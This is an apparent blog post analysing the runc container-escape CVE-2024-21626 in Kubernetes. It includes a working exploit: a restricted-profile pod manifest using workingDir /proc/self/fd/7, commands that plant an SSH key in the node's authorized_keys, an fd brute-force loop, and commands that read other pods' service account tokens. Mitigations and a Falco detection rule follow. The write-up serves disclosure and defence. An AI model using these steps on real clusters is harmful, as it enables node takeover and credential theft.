Analysis of the CVE

On the 31st of January 2024, a new CVE was released for the runc container runtime, which makes it possible to break out of a container. The short summary of the CVE is that, due to an internal file descriptor leak in runc, it is possible to access the host’s filesystem from within a container when the container is started with a specific working directory. This affects runc 1.1.11 and earlier.

More info can be read in the very thorough security advisory in the runc GitHub repository: opencontainers/runc/GHSA-xr7r-f8xq-vfvv

Since runc is used as the container runtime by containerd, and containerd is used for most Kubernetes clusters, how will this CVE affect your Kubernetes cluster? Are you protected against this CVE if you are enforcing the “restricted” Pod Security Standard (PSS) with an admission controller like Pod Security Admission, Kyverno or Gatekeeper? Can this CVE be exploited when you don’t allow root containers, for example?

Let’s put on our hacker hat and explore!

Translation of the CVE to a Kubernetes manifest

Let’s try attack 1 from the CVE documentation: if you set the container’s process.cwd to /proc/self/fd/7/ (the 7 can be environment specific and depends on the file descriptor opening order in runc), the host filesystem is left accessible from within the container. In your Kubernetes pod manifest, process.cwd (cwd stands for current working directory) is set with spec.containers[].workingDir.

I am also interested in testing whether this CVE can be exploited while still being compliant with the Pod Security Standards. So in the following example I set the securityContext as strict as possible, so that the container completely complies with the PSS and would be allowed to run on the cluster even with the “restricted” profile enforced. I chose to run as user 1000 since that is the default uid of the first user on Linux; this user probably exists on the underlying node, which gives me write access to that user’s home folder and to any files its group is allowed to write.

A simple sleep infinite will keep the container running so I can kubectl exec -it into the container to get a shell.

---
apiVersion: v1
kind: Pod
metadata:
  name: malicious-pod
  namespace: cve-2024-21626
spec:
  containers:
    - name: container
      image: alpine
      workingDir: /proc/self/fd/7
      command:
        - sleep
        - infinite
      securityContext:
        capabilities:
          drop:
            - ALL
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        seccompProfile:
          type: RuntimeDefault
        runAsNonRoot: true
        runAsUser: 1000

Demonstration

So in the GIF below you can see three screens; the top screen shows the running pods in the cve-2024-21626 namespace, and the bottom screen is a shell on the node where the pod runs, accessed via SSH. First, in the bottom node shell, I show that the ~/.ssh/authorized_keys file is empty. Then I create the Kubernetes pod from the pod spec above; you can see it starting in the top screen. Then I use kubectl exec -it to get a shell in the container and, lo and behold, under ../../../../ the node filesystem is present!

As a demonstration I edit ../../../../home/ubuntu/.ssh/authorized_keys to gain remote access as the ubuntu user on this node, and show in the node shell that the file has indeed been changed on the node.

Demo of the CVE to gain access to the underlying node filesystem
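
Roughly, the steps from the GIF translate to the commands below, assuming the pod spec above is saved as malicious-pod.yaml. The fd number, the node username (ubuntu) and the SSH key are specific to my environment, so treat them as placeholders:

$ kubectl apply -f malicious-pod.yaml
$ kubectl -n cve-2024-21626 exec -it malicious-pod -- sh

# then, from the shell inside the container:
$ ls ../../../../                # lists the host root filesystem
$ echo "ssh-ed25519 AAAA... attacker@example" >> ../../../../home/ubuntu/.ssh/authorized_keys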

I have tested this pod on Azure AKS and on a local cluster set up with Rancher RKE2, and on both I was able to get this working. The only thing that takes some trial and error is the /proc/self/fd/7/ path; the number changes even on the same node. The highest success rate was with /proc/self/fd/7/, but /proc/self/fd/9/ was also common. The sketch below shows one way to automate that guessing.
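
A minimal sketch of that automation, again assuming the pod spec is saved as malicious-pod.yaml (the file name and the fd range are just my choices). Pods that point at a descriptor that is not open will simply fail to start, and the ones that do start can be checked by hand:

for fd in 4 5 6 7 8 9 10; do
  sed -e "s|/proc/self/fd/7|/proc/self/fd/$fd|" \
      -e "s|name: malicious-pod|name: malicious-pod-$fd|" \
      malicious-pod.yaml | kubectl apply -f -
done
# exec into the pods that reach Running and check whether the host filesystem is reachable
kubectl -n cve-2024-21626 get pods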

Implications

As seen in the demo above, it is pretty easy to gain access to the node filesystem by exploiting the CVE. The demo was fairly simple and required a shell into a container where I executed some manual steps, but this can easily be automated and put into a container image that looks normal but still adds a malicious SSH key or payload to the underlying node. That image then only needs to be started on the cluster to be effective.

As soon as someone has access to the node, your whole cluster is pretty much compromised. The pods running on the node mount their secrets (database passwords, Kubernetes API tokens), configmaps and volumes under /var/lib/kubelet/pods, so a quick look through those directories and you can have access to the databases belonging to the apps. Since those files and directories are readable by everyone on the system, you don’t need to be root in the container to access them.

# ls -l /var/lib/kubelet/pods/b68ccf8b-ebc9-4cd7-8454-92ead5d0887e/volumes/kubernetes.io~secret/config/
lrwxrwxrwx    1 root     root            13 Feb  6 22:00 config.yaml -> ..data/config.yaml
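
The projected service account tokens of the other pods on the node live under the same tree, so from within the breakout (using the ../../../../ prefix from the demo, and subject to the file permissions on your nodes) something like the following already hands over API credentials for those workloads; the pod UIDs and volume names will of course differ:

$ ls ../../../../var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/
$ cat ../../../../var/lib/kubelet/pods/*/volumes/kubernetes.io~projected/kube-api-access-*/token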

So it is not just your Kubernetes cluster that is at risk; even services accessed from the cluster can now be at risk.

Mitigation and detection

As seen above, just having a tool that analyses the pod manifest (PSA, Kyverno, Gatekeeper) will fall short in catching this CVE, since you can run the pod with the most “restricted” pod security settings and still exploit it. The easiest mitigation is to update to the latest patched runc, 1.1.12, which is available as we speak.
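
To check whether a node is affected you can, for example, look at the runc version on the node itself; where the binary lives and how it is packaged differs per distribution and cloud product:

$ runc --version   # run on the node, e.g. over SSH
# anything below 1.1.12 is vulnerable to CVE-2024-21626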

Since most of you use a (cloud) product that integrates runc, here is a set of links for reference on which versions ship the patched runc:

If patching is for some reason not yet possible, you can decrease the risk by only allowing images to be pulled from a trusted registry, to avoid a malicious image from the internet being run through social engineering or by accident. This can be set up with the help of an admission controller like Kyverno or Gatekeeper: you create an admission policy that only allows images from a certain registry URL, as in the sketch below. It is then your responsibility to keep those images secure; the base image you build from could still be compromised.
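
As an illustration, such a policy could look like the following Kyverno ClusterPolicy sketch, modelled on the commonly used restrict-image-registries pattern; registry.example.com is a placeholder for your own trusted registry:

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: restrict-image-registries
spec:
  validationFailureAction: Enforce
  background: true
  rules:
    - name: validate-registries
      match:
        any:
          - resources:
              kinds:
                - Pod
      validate:
        message: "Images may only be pulled from the trusted registry."
        pattern:
          spec:
            # the =() anchors make the same check apply to init/ephemeral containers if present
            =(ephemeralContainers):
              - image: "registry.example.com/*"
            =(initContainers):
              - image: "registry.example.com/*"
            containers:
              - image: "registry.example.com/*"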

For runtime detection, the awesome people at Snyk have made a detection tool available for container breakouts, or “leaky vessels” as they call them. snyk/leaky-vessels-dynamic-detector will watch for and check a set of possible container breakouts. You can run this tool as a DaemonSet on Kubernetes to detect just CVE-2024-21626, or run it privileged on the node to detect all the mentioned vulnerabilities. It writes to stdout when an exploit is detected, so you can set up alerts on those log lines.

Another way to detect whether someone is exploiting this CVE is with Falco; the user @NitroCao shared the following Falco rule on his GitHub, but he places an asterisk that filtering out false positives with proc.name != "runc:[1:CHILD]" is not a good solution.

# source: https://github.com/NitroCao/CVE-2024-21626?tab=readme-ov-file#how-to-detect
- macro: container
  condition: (container.id != host and container.name exists)

- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
  desc: >
        Detect CVE-2024-21626, runC escape vulnerability through /proc/[PID]/cwd.
  condition: >
    container and (
      (evt.type = execve and proc.cwd startswith "/proc/self/fd") or
      (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or
      (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")
    ) and proc.name != "runc:[1:CHILD]"    
  output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
  priority: CRITICAL
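
If you run Falco through its official Helm chart, one way to load this rule is via the chart’s customRules value; the file name and namespace below are just placeholders:

# values-cve-2024-21626.yaml
customRules:
  cve-2024-21626-rules.yaml: |-
    # paste the macro and rule from above here

# then install or upgrade Falco with those values
helm upgrade --install falco falcosecurity/falco \
  --namespace falco --create-namespace \
  -f values-cve-2024-21626.yaml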

So I would advise, where possible, to just upgrade to the latest runc; then you are sure that this CVE has been mitigated.

Hopefully you found this post useful; it was for sure fun for me to play with this CVE :)